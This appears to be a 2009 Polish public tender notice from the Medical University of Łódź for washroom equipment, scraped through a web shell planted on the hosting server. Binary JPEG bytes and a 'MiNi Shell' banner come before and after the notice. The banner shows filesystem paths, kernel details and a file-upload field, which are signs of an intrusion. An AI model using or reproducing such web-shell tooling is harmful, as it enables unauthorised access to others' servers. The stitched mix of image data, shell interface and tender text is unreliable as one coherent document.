JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/363230-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa i montaż urządzeń pierwszego wyposażenia w Centrum Kliniczno-Dydaktycznym Uniwersytetu Medycznego w Łodzi ZP/96/2009</b><br>
<b>Numer ogłoszenia: 363230 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny , al. Kościuszki 4, 90-419 Łódź, woj. łódzkie, tel. 042 6302330, faks 042 6393952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umed.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń pierwszego wyposażenia w Centrum Kliniczno-Dydaktycznym Uniwersytetu Medycznego w Łodzi ZP/96/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż urządzeń pierwszego wyposażenia w Centrum Kliniczno-Dydaktycznym Uniwersytetu Medycznego w Łodzi przy ul. Pomorskiej 251.
Zamówienie dotyczy nastepujących urządzeń, tj.: dozownik mydła w płynie - 158 szt., dozownik płynów dezynfekcyjnych - 36 szt., pojemnik na ręczniki jednorazowe - 183 szt., kosz na śmieci - 226 szt., podajnik papieru toaletowego - 105 szt., szczotka do toalety - 110 szt., kosze do damskich toalet - 17 szt., półka szklana pod lustro - 186 szt., wieszak z zawieszakami - 163 szt., zestaw do sprzątania - 5 szt., lustro ścienne - 186 szt., suszarka do rąk - 43 szt., kosz wiszący - 36 szt.
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 SIWZ.
Przedmiot zamówienia ma być kompletny w sposób umożliwiający użytkowanie zgodnie z przeznaczeniem z chwilą jego uruchomienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3, 43.92.84.80-6, 39.22.43.10-4, 39.29.93.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości :
-    7 900,00 zł,	słownie: siedem tysięcy dziewięćset zł, 00,100
Ostateczny termin wniesienia wadium i doręczenia dowodu jego wniesienia upływa dnia: 26.10.2009 r. do godz. 12:00
2.	Wadium może być wniesione w następujących formach: 
- pieniądzu   przelewem na konto ING BANK ŚLĄSKI W ŁODZI 21 10501461 1000 0022 8237 8799 do dnia 26.10.2009 r. do godz. 12:00 z zaznaczeniem Wadium   ZP-96-2009 - Dostawa i montaż urządzeń pierwszego wyposażenia dla CKD UM w Łodzi. 
3. Dokument musi być zgodny z wytycznymi z rozdziału XIII ust. 2 SIWZ.
- w poręczeniach bankowych (w postaci oryginału dokumentu) lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych (w postaci oryginału dokumentu),
- gwarancjach ubezpieczeniowych (w postaci oryginału dokumentu).
4.	Zamawiający dokona niezwłocznie zwrotu wadium z chwilą, gdy:
- upłynął termin związania z ofertą
- zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
- Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
- który wycofał ofertę przed upływem terminu składania oferty,
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
6.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie § 46 ust. 2 pkt. 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
7.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, nie złożył dokumentów, oświadczeń lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:
1.  Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych.
     -  posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy 
        nakładają obowiązek posiadania takich uprawnień,
     -  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
   zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - o zamówienie ubiegać się mogą Wykonawcy, którzy w okresie ostatnich trzech lat od daty wszczęcia postępowania, a jeżeli okres działalności jest krótszy w tym okresie, zrealizowali (rozpoczęli i zakończyli) minimum jedna dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia o wartości  brutto min. 150 000,00 tysięcy zł.,        
     -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia,
     -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Wykonawców, którzy wskażą w ofercie części zamówienia, których wykonanie zamierzają powierzyć Podwykonawcom.
3.   W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy 
     ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4.  Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty. 
5.  Zamawiający odrzuca ofertę wykonawcy:
    - gdy jest ona niezgodna z ustawą,
    - jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.     87 ust. 2 pkt 3,
    - jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
      nieuczciwej konkurencji, 
    - zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
    - wykluczonego z udziału w postępowaniu o udzielenie zamówienia, 
    - zawiera błędy w obliczeniu ceny, 
    - który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o    której mowa w art. 87 ust. 2 pkt 3 
    - nieważnej na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wypełniony Formularz Oferty wg załącznika nr 1 do SIWZ.
  2.   Wypełniony  Przedmiot zamówienia wg załącznika nr 2 do SIWZ.
  3.   Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu o zamówienie 
        publiczne - art. 22 ust. 1 pkt. 1- 4 prawa zamówień publicznych - załącznik nr 3.1 do SIWZ.
  4.  Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24   ust. 1 pkt. 1-10 oraz z art. 24 ust. 2 pkt. 1-4 prawa zamówień publicznych   załącznik nr 3.2. do SIWZ.
  5.    Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1:
  5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
        ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
        terminu składania ofert.
  6.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
       Polskiej, zamiast dokumentów, o których mowa w pkt. 5 składa odpowiedni dokument lub   
       dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania 
       potwierdzające, odpowiednio, że: 
       a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości,        
  7.  Dokumenty, o których mowa w pkt. 6a powinny być wystawione nie wcześniej niż 6 
       miesięcy przed upływem terminu składania ofert.  
  8. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
      zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6, zastępuje się je 
      dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
      sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
      odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
      zamieszkania.
  9. Upoważnienie do podpisania oferty (w formie oryginału lub notarialnie potwierdzonej kopii), o ile upoważnienie to nie wynika z  innych dokumentów dołączonych do oferty.
10. W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie  dla wspólnego pełnomocnika. Pełnomocnictwo powinno być podpisane przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z formą reprezentacji każdego z nich.
11. Specyfikacja oferowanego przedmiotu zamówienia - opis wraz z rysunkami.
12. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw (min. jednej) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia o wartości brutto min. 150 000,00 tysięcy zł., z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy  zostały wykonane należycie.
13. Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umed.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Uniwersytetu Medycznego w Łodzi, Al. Kościuszki 4  w Biurze Obsługi i Realizacji Zamówień Publicznych, III piętro, pok. 21..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Uniwersytetu Medycznego w Łodzi, Al. Kościuszki 4  w Biurze Obsługi i Realizacji Zamówień Publicznych, III piętro, pok. 22..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com